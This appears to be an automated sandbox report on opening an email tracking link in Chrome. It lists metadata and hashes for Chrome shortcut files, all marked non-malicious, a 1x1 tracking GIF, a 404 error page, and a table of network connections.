            Preview:L..................F.@.. ...$+.,......g.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2675
            Entropy (8bit):3.9912984174207344
            Encrypted:false
            SSDEEP:48:8WdesTTHAHy/OidAKZdA1seh/iZUkAQkqehZlxy+2:89sfY9Q4xy
            MD5:31772D99E2116DB7916E282DF6B2E02A
            SHA1:FDD86942CB4612A7C361BF5FF90427539F3BFCD4
            SHA-256:26F5AD117965A912B3BC6A5021FD8D67C8CC101288A56BCB4A39FBA4DAE8C8DA
            SHA-512:CAF041B8DAEBF2A0616703AB2160892BBA8D2293E01E54F709E275F5A001AD0A7043D537F37540BE54E1AF1DC86EB01A6B8E83B53F3E625CF1DF9B62C724C6B1
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,....\2\.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2689
            Entropy (8bit):4.005728306361498
            Encrypted:false
            SSDEEP:48:8ydesTTHAHy/OidAKZdA14meh7sFiZUkmgqeh7sPlxy+BX:8psfEnfxy
            MD5:81DBCF8EC2026F84B60CCCA4F7DE5163
            SHA1:AED1400FB6092175457DD9CAC0BE5714AE656133
            SHA-256:271FD60291DFD68DBC7E3C33F1FDD1742AB8774D8B4450BAC67E354AAA1E9252
            SHA-512:B97F2354B10EBB7A555941A097026A8D0891B74469B789EA136231BA33F9E2B945C469C4AE17C40D148489BF7132B52AA2E0E6D4C57D1197A0D29812B1044FCE
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2677
            Entropy (8bit):3.9924839174575126
            Encrypted:false
            SSDEEP:48:8adesTTHAHy/OidAKZdA1TehDiZUkwqehNlxy+R:8BsfTVxy
            MD5:38F79B9008042961E97713D1CD6E564C
            SHA1:3D6E210690AB95AAA0A559D307EBE4C04103F8FD
            SHA-256:D14C1E151707F6F27704B40D340654EFD424300A342FA6AC25845A44D77B25F6
            SHA-512:AA4FF1D1C26F1978F91ADF1A6EDE26878878C899B1FF16B76BC3B2AA2969C44DA9ED89C13B7B15BFA5BB8D1A6D10CB4412143BC292C36EE46154660A462F79B3
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,......V.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2677
            Entropy (8bit):3.9824083545426694
            Encrypted:false
            SSDEEP:48:8jdesTTHAHy/OidAKZdA1dehBiZUk1W1qehblxy+C:8csfj9hxy
            MD5:67A0D81A5C79A38523957BA67A894BFE
            SHA1:E2DB25067E6C0A36F11ACC9628F38F81FB000BD6
            SHA-256:8F18C62A005FC54C4AC24EFF00E5F012CC015B878FA3519D077ADEB797045C30
            SHA-512:6379201AC62937118D561FFB1CC9A2B4BAFF140A3D44A91988F4D5659B9C6E3DED0E4F8CE3D4DCB786E9B52CF0AB49DA3BF19D068A8D994C98D0A30E2425C7EA
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,......a.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2679
            Entropy (8bit):3.9905352520679047
            Encrypted:false
            SSDEEP:48:8+desTTHAHy/OidAKZdA1duTeehOuTbbiZUk5OjqehOuTbFlxy+yT+:8VsfnTfTbxWOvTbfxy7T
            MD5:E1CA1829723154ABC4FCC45BB4F93B44
            SHA1:E040F6932EAE4F83515FA7C7C81D0C458BEDA369
            SHA-256:8ACA7E0727BE223C3A1AF9A80588FBCC84DDC98D3C9ACD3CE4BFB3DD2A581E05
            SHA-512:716B9145BC316D26F08A13C5F15C3139B8E9542141835640A73E5247E2730A5F8839F168C4E843173C4E13E9DD8F32F0235DAEB3C2522DEAF5CEE0F91F0401B0
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,.....ON.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:GIF image data, version 89a, 1 x 1
            Category:downloaded
            Size (bytes):43
            Entropy (8bit):3.0314906788435274
            Encrypted:false
            SSDEEP:3:CUkwltxlHh/:P/
            MD5:325472601571F31E1BF00674C368D335
            SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
            SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
            SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
            Malicious:false
            Reputation:low
            URL:http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            Preview:GIF89a.............!.......,...........D..;
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):1245
            Entropy (8bit):5.462849750105637
            Encrypted:false
            SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
            MD5:5343C1A8B203C162A3BF3870D9F50FD4
            SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
            SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
            SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
            Malicious:false
            Reputation:low
            URL:http://click.email.traininng.com/favicon.ico
            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
            No static file info
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Oct 23, 2024 20:24:31.617561102 CEST | 49673 | 443 | 192.168.2.16 | 204.79.197.203
            Oct 23, 2024 20:24:31.919245005 CEST | 49673 | 443 | 192.168.2.16 | 204.79.197.203
            Oct 23, 2024 20:24:32.526228905 CEST | 49673 | 443 | 192.168.2.16 | 204.79.197.203
            Oct 23, 2024 20:24:33.735340118 CEST | 49673 | 443 | 192.168.2.16 | 204.79.197.203
            Oct 23, 2024 20:24:34.638408899 CEST | 49689 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:24:35.702516079 CEST | 49709 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:35.702734947 CEST | 49710 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:35.708003998 CEST | 80 | 49709 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:35.708127022 CEST | 49709 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:35.708239079 CEST | 49709 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:35.708688974 CEST | 80 | 49710 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:35.708750963 CEST | 49710 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:35.713552952 CEST | 80 | 49709 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:36.136229038 CEST | 49673 | 443 | 192.168.2.16 | 204.79.197.203
            Oct 23, 2024 20:24:36.378110886 CEST | 80 | 49709 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:36.383610964 CEST | 49709 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:36.389344931 CEST | 80 | 49709 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:36.389426947 CEST | 49709 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:36.485855103 CEST | 49710 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:36.491345882 CEST | 80 | 49710 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:36.648236990 CEST | 80 | 49710 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:36.648472071 CEST | 80 | 49710 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:36.649290085 CEST | 49710 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:36.649419069 CEST | 49710 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:36.655082941 CEST | 80 | 49710 | 13.111.71.11 | 192.168.2.16
            Oct 23, 2024 20:24:36.655143023 CEST | 49710 | 80 | 192.168.2.16 | 13.111.71.11
            Oct 23, 2024 20:24:37.810636044 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:37.810683966 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:37.810767889 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:37.812273026 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:37.812294960 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.681590080 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.681664944 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:38.684609890 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:38.684628963 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.684936047 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.720263958 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:38.767339945 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.964184999 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.964238882 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.964289904 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:38.964364052 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:38.964384079 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:38.964400053 CEST | 49712 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:38.964410067 CEST | 443 | 49712 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:39.006521940 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:39.006561041 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:39.006640911 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:39.006875992 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:39.006889105 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:39.570933104 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:39.570965052 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:39.571068048 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:39.571280956 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:39.571293116 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:39.784507990 CEST | 49678 | 443 | 192.168.2.16 | 20.189.173.10
            Oct 23, 2024 20:24:39.855659962 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:39.855734110 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:39.856784105 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:39.856794119 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:39.856995106 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:39.857939959 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:39.899350882 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:40.088258982 CEST | 49678 | 443 | 192.168.2.16 | 20.189.173.10
            Oct 23, 2024 20:24:40.105509043 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:40.105608940 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:40.105756998 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:40.106359959 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:40.106375933 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:40.106384993 CEST | 49713 | 443 | 192.168.2.16 | 184.28.90.27
            Oct 23, 2024 20:24:40.106389999 CEST | 443 | 49713 | 184.28.90.27 | 192.168.2.16
            Oct 23, 2024 20:24:40.439277887 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:40.439589024 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:40.439614058 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:40.440475941 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:40.440537930 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:40.446351051 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:40.446408987 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:40.486267090 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:40.486323118 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:40.533261061 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:40.693377018 CEST | 49678 | 443 | 192.168.2.16 | 20.189.173.10
            Oct 23, 2024 20:24:40.948240042 CEST | 49673 | 443 | 192.168.2.16 | 204.79.197.203
            Oct 23, 2024 20:24:41.904476881 CEST | 49678 | 443 | 192.168.2.16 | 20.189.173.10
            Oct 23, 2024 20:24:42.445725918 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:42.445768118 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:42.445903063 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:42.447400093 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:42.447416067 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.230622053 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.230783939 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.233344078 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.233362913 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.233648062 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.276262999 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.292931080 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.339328051 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.542313099 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.542340994 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.542347908 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.542356968 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.542382956 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.542403936 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.542422056 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.542464018 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.542566061 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.543363094 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.543411016 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.543421030 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.543442965 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.543492079 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.554375887 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.554395914 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:43.554409981 CEST | 49715 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:24:43.554414988 CEST | 443 | 49715 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:24:44.246452093 CEST | 49680 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:24:44.310307980 CEST | 49678 | 443 | 192.168.2.16 | 20.189.173.10
            Oct 23, 2024 20:24:44.549303055 CEST | 49680 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:24:45.155299902 CEST | 49680 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:24:46.370388985 CEST | 49680 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:24:48.783278942 CEST | 49680 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:24:49.119512081 CEST | 49678 | 443 | 192.168.2.16 | 20.189.173.10
            Oct 23, 2024 20:24:50.451466084 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:50.451633930 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:50.451709986 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:50.552284956 CEST | 49673 | 443 | 192.168.2.16 | 204.79.197.203
            Oct 23, 2024 20:24:50.985743046 CEST | 49714 | 443 | 192.168.2.16 | 142.250.186.36
            Oct 23, 2024 20:24:50.985773087 CEST | 443 | 49714 | 142.250.186.36 | 192.168.2.16
            Oct 23, 2024 20:24:53.586429119 CEST | 49680 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:24:58.724390984 CEST | 49678 | 443 | 192.168.2.16 | 20.189.173.10
            Oct 23, 2024 20:25:03.195542097 CEST | 49680 | 80 | 192.168.2.16 | 192.229.211.108
            Oct 23, 2024 20:25:19.946171999 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:19.946233034 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:19.946356058 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:19.946871042 CEST | 49716 | 443 | 192.168.2.16 | 172.202.163.200
            Oct 23, 2024 20:25:19.946899891 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
            Oct 23, 2024 20:25:20.708641052 CEST | 443 | 49716 | 172.202.163.200 | 192.168.2.16
